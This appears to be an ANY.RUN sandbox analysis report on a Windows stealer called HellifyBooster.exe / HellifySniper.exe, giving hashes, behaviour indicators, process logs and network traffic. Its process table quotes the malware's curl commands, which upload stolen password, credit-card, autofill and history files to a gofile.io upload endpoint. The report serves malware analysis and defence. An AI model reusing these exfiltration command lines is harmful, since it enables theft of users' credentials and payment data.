File name:

HellifyBooster.exe

Full analysis: https://app.any.run/tasks/db1b0a1c-02b9-4ee4-b2e3-a368acd4f60f
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: August 13, 2024, 14:39:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
python
pyinstaller
stealer
evasion
discordgrabber
generic
waspstealer
discord
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64, for MS Windows
MD5:

381C2255C06C5C7D270578B098D947A5

SHA1:

8FC8E1351EBB712E2ED704A920905D2B470C682C

SHA256:

B6C6E4DC1708D34EF5F787BA0BA88B6025119B60B6E6858C6E6D7141AFBB9EA2

SSDEEP:

98304:CDZTwrhQiH5yqqDsE1zWyJqab09EqYvh+QHqXNIKsZG0+k7FpcXw9p5j8YjjHz5I:q3rN0+rH8cu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • HellifySniper.exe (PID: 6652)

    • Create files in the Startup directory

      • HellifySniper.exe (PID: 6652)

    • DISCORDGRABBER has been detected (YARA)

      • HellifySniper.exe (PID: 6652)

    • WASPSTEALER has been detected (YARA)

      • HellifySniper.exe (PID: 6652)

  • SUSPICIOUS

    • Drops the executable file immediately after the start

      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)

    • Application launched itself

      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)

    • Process drops legitimate windows executable

      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)

    • The process drops C-runtime libraries

      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)

    • Process drops python dynamic module

      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)

    • Executable content was dropped or overwritten

      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)

    • Loads Python modules

      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)

    • Starts CMD.EXE for commands execution

      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)

    • Checks for external IP

      • svchost.exe (PID: 2256)
      • HellifySniper.exe (PID: 6652)

    • Data upload via CURL

      • curl.exe (PID: 208)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 2532)
      • curl.exe (PID: 6788)
      • curl.exe (PID: 2804)
      • curl.exe (PID: 6052)

    • There is functionality for taking screenshot (YARA)

      • HellifyBooster.exe (PID: 6364)

  • INFO

    • Create files in a temporary directory

      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)

    • Reads the computer name

      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 208)
      • curl.exe (PID: 2532)

    • Checks supported languages

      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
      • curl.exe (PID: 208)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 2804)
      • curl.exe (PID: 6788)
      • curl.exe (PID: 6052)
      • curl.exe (PID: 2532)

    • Checks proxy server information

      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)

    • PyInstaller has been detected (YARA)

      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6652)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)

    • Creates files or folders in the user directory

      • HellifySniper.exe (PID: 6652)

    • Attempting to use instant messaging service

      • HellifySniper.exe (PID: 6652)
      • svchost.exe (PID: 2256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:07:12 14:16:03+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.4
CodeSize: 173056
InitializedDataSize: 151040
UninitializedDataSize: -
EntryPoint: 0xb4d0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
157
Monitored processes
26
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start THREAT hellifybooster.exe conhost.exe no specs THREAT hellifybooster.exe cmd.exe no specs THREAT hellifysniper.exe #DISCORDGRABBER hellifysniper.exe svchost.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFileC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
1568C:\WINDOWS\system32\cmd.exe /c title Hellify BoosterC:\Windows\System32\cmd.exeHellifyBooster.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2256C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2468\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2532curl -F "file=@C:\Users\admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFileC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
2804curl -F "file=@C:\Users\admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFileC:\Windows\System32\curl.execmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
26
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
3844C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"C:\Windows\System32\cmd.exeHellifySniper.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
5136C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"C:\Windows\System32\cmd.exeHellifySniper.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
26
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
5888\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5916\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
6 237
Read events
6 237
Write events
0
Delete events
0

Modification events

No data
Executable files
167
Suspicious files
2
Text files
3
Unknown types
9

Dropped files

PID
Process
Filename
Type
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingmath.cp312-win_amd64.pydexecutable
MD5:D80E23C523BEA5ACA6EC702EF6DCBF8D
SHA256:C480EDC4EBD5757B92F543B0589AF0C6FEBF1153992B948322B7E69F2A0EAF61
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingtk.cp312-win_amd64.pydexecutable
MD5:6469B7315A33774D1C7EF7459058F889
SHA256:317E4219DE122F058C86F858F11B9510B6D196FD8027DD35352E7784E6968500
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingcms.cp312-win_amd64.pydexecutable
MD5:30CEC332935A3E27B399A0939BDBECD7
SHA256:91D0D471C50CFCC9FD8688AE2350477408BB987E67A1C5F508D17C5DD021314F
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\VCRUNTIME140.dllexecutable
MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
SHA256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:E8B9D74BFD1F6D1CC1D99B24F44DA796
SHA256:B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\_hashlib.pydexecutable
MD5:DA02CEFD8151ECB83F697E3BD5280775
SHA256:FD77A5756A17EC0788989F73222B0E7334DD4494B8C8647B43FE554CF3CFB354
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\_lzma.pydexecutable
MD5:195DEFE58A7549117E06A57029079702
SHA256:7BF9FF61BABEBD90C499A8ED9B62141F947F90D87E0BBD41A12E99D20E06954A
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\_bz2.pydexecutable
MD5:5BEBC32957922FE20E927D5C4637F100
SHA256:3ED0E5058D370FB14AA5469D81F96C5685559C054917C7280DD4125F21D25F62
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\_decimal.pydexecutable
MD5:492C0C36D8ED1B6CA2117869A09214DA
SHA256:B8221D1C9E2C892DD6227A6042D1E49200CD5CB82ADBD998E4A77F4EE0E9ABF1
6296HellifyBooster.exeC:\Users\admin\AppData\Local\Temp\_MEI62962\VCRUNTIME140_1.dllexecutable
MD5:F8DFA78045620CF8A732E67D1B1EB53D
SHA256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
64
DNS requests
25
Threats
26

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6140
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6724
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2968
svchost.exe
GET
304
88.221.169.173:80
http://x1.c.lencr.org/
unknown
whitelisted
6764
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4576
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2120
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1076
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
6364
HellifyBooster.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
unknown
4576
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6652
HellifySniper.exe
172.67.75.40:443
rentry.co
CLOUDFLARENET
US
unknown
6652
HellifySniper.exe
104.26.13.205:443
api.ipify.org
CLOUDFLARENET
US
unknown
6652
HellifySniper.exe
51.38.43.18:443
api.gofile.io
OVH SAS
FR
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.110.133
shared
rentry.co
  • 172.67.75.40
  • 104.26.2.16
  • 104.26.3.16
unknown
api.ipify.org
  • 104.26.13.205
  • 104.26.12.205
  • 172.67.74.152
shared
api.gofile.io
  • 51.38.43.18
  • 45.112.123.126
whitelisted
geolocation-db.com
  • 159.89.102.253
whitelisted
www.bing.com
  • 184.86.251.25
  • 184.86.251.7
  • 184.86.251.4
  • 184.86.251.5
  • 184.86.251.24
  • 184.86.251.23
  • 184.86.251.20
  • 184.86.251.28
  • 184.86.251.9
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.160.14
  • 20.190.160.17
  • 40.126.32.140
  • 20.190.160.20
  • 40.126.32.138
  • 40.126.32.133
  • 20.190.160.22
  • 40.126.32.134
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
2256
svchost.exe
Misc activity
ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
6652
HellifySniper.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652
HellifySniper.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652
HellifySniper.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652
HellifySniper.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
2256
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
6652
HellifySniper.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2256
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
6652
HellifySniper.exe
Misc activity
ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
HellifyBooster.exe